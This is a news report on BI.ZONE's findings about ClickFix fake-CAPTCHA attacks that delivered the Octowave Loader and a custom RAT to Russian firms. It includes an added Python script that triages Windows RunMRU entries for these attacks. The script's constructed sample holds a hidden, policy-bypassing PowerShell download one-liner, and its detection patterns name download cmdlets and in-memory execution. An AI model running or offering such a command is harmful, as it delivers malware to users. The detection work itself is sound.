Hackers Exploit Fake CAPTCHA in Targeted Attacks on Russian Companies

In May and early June 2025, BI.ZONE Threat Intelligence detected ClickFix attacks against 30 Russian companies. Until then the technique had been used only against foreign organizations, the BI.ZONE press service told Habr.

ClickFix is a social-engineering technique that tricks the victim into running malicious code themselves; no software vulnerability is exploited. In these attacks the perpetrators posed as law enforcement agencies and distributed PDF documents whose text was blurred: to read it, the recipient supposedly had to confirm they were not a robot. The "I'm not a robot" button led to an attacker-controlled site, which displayed another window with a fake CAPTCHA.

Clicking the fake CAPTCHA silently copied a PowerShell command to the user's clipboard. The page then instructed the user to press Win + R, paste with Ctrl + V, and press Enter, which ran the command on the victim's machine under the user's own account.
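The Win + R step leaves a forensic trace: Windows records every command typed into the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one single-letter value per entry with a trailing "\1" and an MRUList value giving most-recent-first order. The following Python triage script is an added example (not part of the article and not BI.ZONE's tooling) that parses RunMRU values and scores each entry for ClickFix indicators: a scripting host, a hidden window, an execution-policy bypass, an encoded command, a download cmdlet, or in-memory execution. The sample values are constructed for the example; the `read_runmru_from_registry` helper reads the live key when run on a Windows host.

```python
import re

# Constructed sample of the values under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU after a
# ClickFix lure (made up for this example, not taken from a real host).
# Windows stores each Run-dialog entry under a single-letter value name with a
# trailing "\1", and MRUList lists the letters most-recent-first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -w hidden -ep bypass -c \"iwr http://example.invalid/m.png "
         "-OutFile $env:TEMP\\m.png\"\\1",
}

# Each indicator is a name plus a pattern; the score is how many of them fire.
INDICATORS = [
    ("lolbin", re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|certutil|bitsadmin|curl)\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|wget)\b", re.I)),
    ("in_memory_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
]


def parse_runmru(values):
    """Return (slot, command) pairs most-recent-first, with the trailing '\\1' stripped."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((letter, cmd))
    return entries


def score_command(cmd):
    """Names of the indicators that match this Run-dialog command, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def triage_runmru(values, min_hits=2):
    """Flag entries with at least `min_hits` indicators; a lone 'cmd' or 'powershell'
    is normal admin behaviour, a hidden-window download one-liner is not."""
    findings = []
    for letter, cmd in parse_runmru(values):
        hits = score_command(cmd)
        if len(hits) >= min_hits:
            findings.append({"slot": letter, "command": cmd, "indicators": hits})
    return findings


def read_runmru_from_registry():
    """Read the live RunMRU key on a Windows host. The import is inside the function
    so the rest of the script (and the constructed sample) runs on any OS."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            values[name] = data
            index += 1
    return values


if __name__ == "__main__":
    for f in triage_runmru(SAMPLE_RUNMRU):
        print(f"slot {f['slot']}: {', '.join(f['indicators'])}\n  {f['command']}")
```

RunMRU only records what was typed into the Run dialog, so it complements rather than replaces PowerShell script-block logging (Event ID 4104) and process-creation telemetry showing powershell.exe spawned by explorer.exe.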

The command downloaded a PNG file from the attackers' server that carried the Octowave Loader. The loader shipped together with legitimate files, some of which had malicious components hidden inside; one of them used steganography to conceal the code that launched a previously undocumented remote access Trojan (RAT).

The RAT collected basic system information and let the attackers execute commands on the victim's device. The PNG files were disguised as political memes, though the victim never saw them: they were downloaded and opened silently.

BI.ZONE Threat Intelligence experts believe the attacks were aimed at espionage, pointing to the custom-built RAT and to the emails being disguised as official notifications from authorities.